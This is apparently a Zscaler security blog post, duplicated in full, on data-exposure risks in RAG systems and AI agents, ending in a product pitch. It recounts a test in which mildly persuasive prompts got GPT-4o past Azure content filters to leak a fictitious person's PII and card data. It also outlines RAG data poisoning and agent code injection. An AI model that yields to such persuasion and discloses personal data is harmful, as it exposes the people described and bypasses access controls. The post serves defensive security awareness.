OverviewData is the lifeblood of modern enterprise applications. Large volumes of data have enabled modern businesses to generate business insights, improve ROI and deliver customer excellence. However, these insights and ROI benefits heavily rely on business sensitive information. In fact, according to a survey conducted by the Cloud Security Alliance, 89% organizations store business sensitive data or workloads in the public cloud. So far, most of these insights and analytics were powered via machine learning and well labelled data that was part of a strictly controlled data set, with a reasonable understanding of entity relationships in the data.That was until we got large language models (LLMs). One of the challenges LLMs have is they can be unpredictable. In most cases, their responses are designed to be non-deterministic, making responses from LLMs more interesting and, dare I say, human-like. Some of the side effects of these non-deterministic responses is that they can be factually incorrect and unpredictable. In the world of LLMs, these are known as hallucinations. To mitigate hallucinations, LLMs are effectively told to fact check their responses from a known data set (also known as a knowledgebase). This fact-checking process is known as retrieval augmented generation, or RAG. RAG works by retrieving search results from a vector database based on keywords and artifacts detected in the user prompt. The results/chunks of texts extracted from the RAG database helps the LLM to improve the accuracy of its responses and acts as a bounding parameter for the LLM. Figure 1: GenAI application integrated with RAG (Image Source: AWS) A RAG database is typically built on top of unstructured or structured enterprise data, such as a PDF, Word document, Excel sheet, etc. Figure 2: Sensitive data transactions to Azure AI FoundrySensitive data is rapidly moving into these services. Zscaler’s inline GenAI DLP capabilities detected over 53.7M sensitive data transactions to Azure AI Foundry within the last three months alone. Key Security Challenges of RAGAccidental Data Exposure Improper sanitation of data when feeding it into a RAG database can result in complete exposure of sensitive data. Our research detected that depending on the foundational model chosen and the type of vector database, the CSP provided guardrails is largely susceptible to prompt injection and manipulation. Here is a real-world example of what happens when you attach sensitive data to a RAG database:To test this, we created our RAG database about a fictitious persona “Johnson White”, including a significant amount of PII and highly confidential personal information and attached it our Azure AI search instance and then mapped it to our Open AI GPT-4o deployment in Azure AI Foundry.Depending on the content filter (guardrails) chosen, we got mixed results:Default out-of-the-box content filter – Figure 3: Response from GPT-4o with default content filter In the above scenario, the PII is requested initially by directly querying about the credit card data. The guardrails kick in and following some mild changespersuasion to the prompt, god’s data starts to trickle, exposing key sensitive information including PII and PCI data.After increasing the sensitivity thresholds for the guardrails: Figure 4: Response from GPT-4o with enhanced guardrailsWhile we barely had to manipulate the prompts with the default content filter, we had to get slightly more creative for the v2 filter, which did block data such as credit card numbers from getting revealed. However, in both cases, a significant amount of PII leaked out. 💡Key Takeaway – The best way to protect your GenAI data is to make sure it does not reach the AI services in the first place! Prompt filters and guardrails are not bullet-proof.Data authorisation issues: Cloud provides significant granular IAM access control mechanisms when it comes to controlling access to data stores. Enterprise security workflows are usually targeted around access governance of their data stores. However, the above scenario raises additional data authorization headaches for organizations as the same LLM could be leveraged by a person who does not have direct access to the data to obtain transient access via the LLM’s inference endpoints.Figure 5: Indirect data exposure and authorization bypass Data poisoning: If the source data embedded as part of the LLM knowledgebase is injected with malicious content, the results produced will most likely be malicious and could result in further AI supply-chain-related attacks and risks.Data boundary: The RAG data is not limited to your public cloud data stores. For example, AWS Bedrock allows you to connect multiple enterprise SaaS applications as the data source for your knowledge base. Figure 6: Cross-exposure of sensitive data via third-party integrations Cross exposure of sensitive data via the RAG knowledge bases can result in unintended exposure of sensitive data without realizing where the data is leaking from.In conclusion, RAG introduces several challenges that introduce several weaknesses that can completely compromise the integrity of an AI system. Combining RAG with AI AgentsAs we navigate the AI landscape, the attack primitives get even more interesting with the introduction of AI agents. Gartner predicts that by 2028, one-third, of GenAI interactions will use action models and agents to complete tasks and introduce actionability beyond the traditional chatbot. AI agents add the ability to extend its core capabilities by introducing additional toolsets that the LLM can leverage to perform actionable tasks. We are not only introducing the ability for the LLM’s to reach enterprise data, but also providing the ability to take user input and execute code! With AI agents, all roads lead to potential sensitive data!With AWS Bedrock, for example, agents can execute Lambda functions to perform additional tasks and while executing such tasks, parameters can be passed back and forth between the Agent and the Lambda function. This potentially can result in code injection and execution if proper care has not been taken. The threat model highlights potential risks associated with the various entities that are part of the AI Agent Figure 7: Threat model for agentic RAG systems Defending Against AI-Driven Data Risks Using Zscaler DSPMZscaler’s DSPM solution helps customers understand the reach of AI services into your cloud data stores that might contain sensitive data. Visibility into and control over AI data in motion Zscaler customers can discover and enforce control on the usage of private instances of GenAI cloud services in real time via leveraging the Zscaler Zero Trust Exchange™. Figure 8: GenAI dashboard to track sensitive AI data flowsCustomers can eradicate the source of sensitive data into the AI services by applying effective inline controls to block and isolate attempts of uploading sensitive data into the AI workloads in the public cloud. Visibility and Risk Assessment of Sensitive Data Exposed to GenAI at Rest in the Public CloudAI dashboards help customers understand the various AI services that have been deployed in the customer’s cloud environment and what data can be accessed. The dashboard also provides visibility into the type of sensitive data that is potentially exposed to these services. Figure 9: AI Data Exposure Dashboard in the public cloud Out of-the box policies correlating AI posture and data exposureOut-of-the-box policies correlate the exposure of sensitive data to AI agents, the usage of foundation models and their knowledge bases and knowledge base data sources.Figure 10: AI Data Exposure and risk correlation policies Drill down to understand the AI access path and identify overprivileged accessZscaler’s robust data entitlement capabilities give you visibility into direct and indirect AI access. Customers can easily drill down to their cloud data stores to visualize what sensitive data the AI services can access and through which paths. Figure 11: AI data access path for intuitive investigations In conclusion, data security for IaaS, PaaS, and SaaS for both data at rest and data in motion are critical enablers for adoption of secure GenAI capabilities. For a deeper understanding on how Zscaler can help and empower your organization to navigate AI security challenges as well as elevate cloud data security, we invite you to schedule a comprehensive and tailored 1-on-1 demonstration of our solutions that deliver real, actionable results.  

​[#item_full_content] OverviewData is the lifeblood of modern enterprise applications. Large volumes of data have enabled modern businesses to generate business insights, improve ROI and deliver customer excellence. However, these insights and ROI benefits heavily rely on business sensitive information. In fact, according to a survey conducted by the Cloud Security Alliance, 89% organizations store business sensitive data or workloads in the public cloud. So far, most of these insights and analytics were powered via machine learning and well labelled data that was part of a strictly controlled data set, with a reasonable understanding of entity relationships in the data.That was until we got large language models (LLMs). One of the challenges LLMs have is they can be unpredictable. In most cases, their responses are designed to be non-deterministic, making responses from LLMs more interesting and, dare I say, human-like. Some of the side effects of these non-deterministic responses is that they can be factually incorrect and unpredictable. In the world of LLMs, these are known as hallucinations. To mitigate hallucinations, LLMs are effectively told to fact check their responses from a known data set (also known as a knowledgebase). This fact-checking process is known as retrieval augmented generation, or RAG. RAG works by retrieving search results from a vector database based on keywords and artifacts detected in the user prompt. The results/chunks of texts extracted from the RAG database helps the LLM to improve the accuracy of its responses and acts as a bounding parameter for the LLM. Figure 1: GenAI application integrated with RAG (Image Source: AWS) A RAG database is typically built on top of unstructured or structured enterprise data, such as a PDF, Word document, Excel sheet, etc. Figure 2: Sensitive data transactions to Azure AI FoundrySensitive data is rapidly moving into these services. Zscaler’s inline GenAI DLP capabilities detected over 53.7M sensitive data transactions to Azure AI Foundry within the last three months alone. Key Security Challenges of RAGAccidental Data Exposure Improper sanitation of data when feeding it into a RAG database can result in complete exposure of sensitive data. Our research detected that depending on the foundational model chosen and the type of vector database, the CSP provided guardrails is largely susceptible to prompt injection and manipulation. Here is a real-world example of what happens when you attach sensitive data to a RAG database:To test this, we created our RAG database about a fictitious persona “Johnson White”, including a significant amount of PII and highly confidential personal information and attached it our Azure AI search instance and then mapped it to our Open AI GPT-4o deployment in Azure AI Foundry.Depending on the content filter (guardrails) chosen, we got mixed results:Default out-of-the-box content filter – Figure 3: Response from GPT-4o with default content filter In the above scenario, the PII is requested initially by directly querying about the credit card data. The guardrails kick in and following some mild changespersuasion to the prompt, god’s data starts to trickle, exposing key sensitive information including PII and PCI data.After increasing the sensitivity thresholds for the guardrails: Figure 4: Response from GPT-4o with enhanced guardrailsWhile we barely had to manipulate the prompts with the default content filter, we had to get slightly more creative for the v2 filter, which did block data such as credit card numbers from getting revealed. However, in both cases, a significant amount of PII leaked out. 💡Key Takeaway – The best way to protect your GenAI data is to make sure it does not reach the AI services in the first place! Prompt filters and guardrails are not bullet-proof.Data authorisation issues: Cloud provides significant granular IAM access control mechanisms when it comes to controlling access to data stores. Enterprise security workflows are usually targeted around access governance of their data stores. However, the above scenario raises additional data authorization headaches for organizations as the same LLM could be leveraged by a person who does not have direct access to the data to obtain transient access via the LLM’s inference endpoints.Figure 5: Indirect data exposure and authorization bypass Data poisoning: If the source data embedded as part of the LLM knowledgebase is injected with malicious content, the results produced will most likely be malicious and could result in further AI supply-chain-related attacks and risks.Data boundary: The RAG data is not limited to your public cloud data stores. For example, AWS Bedrock allows you to connect multiple enterprise SaaS applications as the data source for your knowledge base. Figure 6: Cross-exposure of sensitive data via third-party integrations Cross exposure of sensitive data via the RAG knowledge bases can result in unintended exposure of sensitive data without realizing where the data is leaking from.In conclusion, RAG introduces several challenges that introduce several weaknesses that can completely compromise the integrity of an AI system. Combining RAG with AI AgentsAs we navigate the AI landscape, the attack primitives get even more interesting with the introduction of AI agents. Gartner predicts that by 2028, one-third, of GenAI interactions will use action models and agents to complete tasks and introduce actionability beyond the traditional chatbot. AI agents add the ability to extend its core capabilities by introducing additional toolsets that the LLM can leverage to perform actionable tasks. We are not only introducing the ability for the LLM’s to reach enterprise data, but also providing the ability to take user input and execute code! With AI agents, all roads lead to potential sensitive data!With AWS Bedrock, for example, agents can execute Lambda functions to perform additional tasks and while executing such tasks, parameters can be passed back and forth between the Agent and the Lambda function. This potentially can result in code injection and execution if proper care has not been taken. The threat model highlights potential risks associated with the various entities that are part of the AI Agent Figure 7: Threat model for agentic RAG systems Defending Against AI-Driven Data Risks Using Zscaler DSPMZscaler’s DSPM solution helps customers understand the reach of AI services into your cloud data stores that might contain sensitive data. Visibility into and control over AI data in motion Zscaler customers can discover and enforce control on the usage of private instances of GenAI cloud services in real time via leveraging the Zscaler Zero Trust Exchange™. Figure 8: GenAI dashboard to track sensitive AI data flowsCustomers can eradicate the source of sensitive data into the AI services by applying effective inline controls to block and isolate attempts of uploading sensitive data into the AI workloads in the public cloud. Visibility and Risk Assessment of Sensitive Data Exposed to GenAI at Rest in the Public CloudAI dashboards help customers understand the various AI services that have been deployed in the customer’s cloud environment and what data can be accessed. The dashboard also provides visibility into the type of sensitive data that is potentially exposed to these services. Figure 9: AI Data Exposure Dashboard in the public cloud Out of-the box policies correlating AI posture and data exposureOut-of-the-box policies correlate the exposure of sensitive data to AI agents, the usage of foundation models and their knowledge bases and knowledge base data sources.Figure 10: AI Data Exposure and risk correlation policies Drill down to understand the AI access path and identify overprivileged accessZscaler’s robust data entitlement capabilities give you visibility into direct and indirect AI access. Customers can easily drill down to their cloud data stores to visualize what sensitive data the AI services can access and through which paths. Figure 11: AI data access path for intuitive investigations In conclusion, data security for IaaS, PaaS, and SaaS for both data at rest and data in motion are critical enablers for adoption of secure GenAI capabilities. For a deeper understanding on how Zscaler can help and empower your organization to navigate AI security challenges as well as elevate cloud data security, we invite you to schedule a comprehensive and tailored 1-on-1 demonstration of our solutions that deliver real, actionable results.